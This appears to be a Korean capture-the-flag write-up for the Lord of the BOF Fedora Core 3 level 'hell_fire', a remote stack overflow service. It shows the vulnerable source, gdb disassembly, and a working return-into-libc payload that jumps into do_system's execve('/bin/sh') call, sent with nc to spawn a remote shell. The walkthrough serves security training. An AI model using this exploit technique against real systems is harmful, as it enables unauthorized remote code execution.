[LOB_FC3] dark_eyes ->hell_fire

#Env 

- NX

- ascii armor

- random stack

#Technic

- do_system RTL

hell_fire.c 소스

/* The Lord of the BOF : The Fellowship of the BOF - hell_fire - Remote BOF on Fedora Core 3 - hint : another fake ebp or got overwriting - port : TCP 7777 */ #include <stdio.h> int main() { char buffer[256]; char saved_sfp[4]; char temp[1024]; printf("hell_fire : What's this smell?\n"); printf("you : "); fflush(stdout); // give me a food fgets(temp, 1024, stdin); // save sfp memcpy(saved_sfp, buffer+264, 4); // overflow!! strcpy(buffer, temp); // restore sfp memcpy(buffer+264, saved_sfp, 4); printf("%s\n", buffer); }

[dark_eyes@Fedora_1stFloor ~]$ cat /etc/xinetd.d/hell_fire

service hell_fire

{

        disable = no

        flags           = REUSE

        socket_type     = stream

        wait            = no

        user            = hell_fire

        server          = /home/dark_eyes/hell_fire

}

1. xineted로 데몬이 구동되고 있어서 자동으로 표준입출력인 연결된다.

2. system함수를 사용할 때 local환경에서는 disable_priv_mode() 함수에 의해 euid를 현재 사용자의 uid로 변경하지만 remote 환경에서는그대로 권한을 받아온다.

---

exploit은 execve("/bin/sh", 0, 0)을 실행하는 곳으로 RTL하는 것이다.

system -> do_system -> "/bin/sh"를 실행하는 execve 주소

(gdb) disass system

Dump of assembler code for function system:

0x007507c0 <system+0>:  push   %ebp

0x007507c1 <system+1>:  mov    %esp,%ebp

0x007507c3 <system+3>:  sub    $0xc,%esp

....

0x007507fe <system+62>: jmp    0x750320 <do_system>

0x00750803 <system+67>: lea    0xffff4617(%ebx),%eax

0x00750809 <system+73>: call   0x750320 <do_system>

(gdb) disass do_system

Dump of assembler code for function do_system:

0x00750320 <do_system+0>:       push   %ebp

0x00750321 <do_system+1>:       mov    $0x1,%edx

.....

0x00750775 <do_system+1109>:    mov    %esi,0x4(%esp)

0x00750779 <do_system+1113>:    lea    0xfffffec4(%ebp),%esi

0x0075077f <do_system+1119>:    call   0x743d30 <sigprocmask>

0x00750784 <do_system+1124>:    mov    0xfffffec4(%ebx),%ecx <- jump

0x0075078a <do_system+1130>:    xor    %edx,%edx

0x0075078c <do_system+1132>:    xor    %eax,%eax

0x0075078e <do_system+1134>:    mov    %edx,0x16bc(%ebx)

0x00750794 <do_system+1140>:    lea    0xffff460f(%ebx),%edx

0x0075079a <do_system+1146>:    mov    (%ecx),%edi

0x0075079c <do_system+1148>:    mov    %eax,0x16b8(%ebx)

0x007507a2 <do_system+1154>:    mov    %esi,0x4(%esp)

0x007507a6 <do_system+1158>:    mov    %edi,0x8(%esp)

0x007507aa <do_system+1162>:    mov    %edx,(%esp)

0x007507ad <do_system+1165>:    call   0x7a5490 <execve>

[000a6161] --- SIGSEGV (Segmentation fault) @ 0 (0) ---

upeek: ptrace(PTRACE_PEEKUSER,3454,48,0): No such process

[????????] +++ killed by SIGSEGV +++

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "a"x270, "\n"';cat)|strace -i ./hell_fire

payload : | 268 dummy | &<do_system+1124> | 

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "a"x268, "\x84\x07\x75\x00"';cat)| nc 192.168.11.137 7777

hell_fire : What's this smell?

you :

id

uid=503(hell_fire) gid=503(hell_fire) context=user_u:system_r:unconfined_t

my-pass

euid = 503

sign me up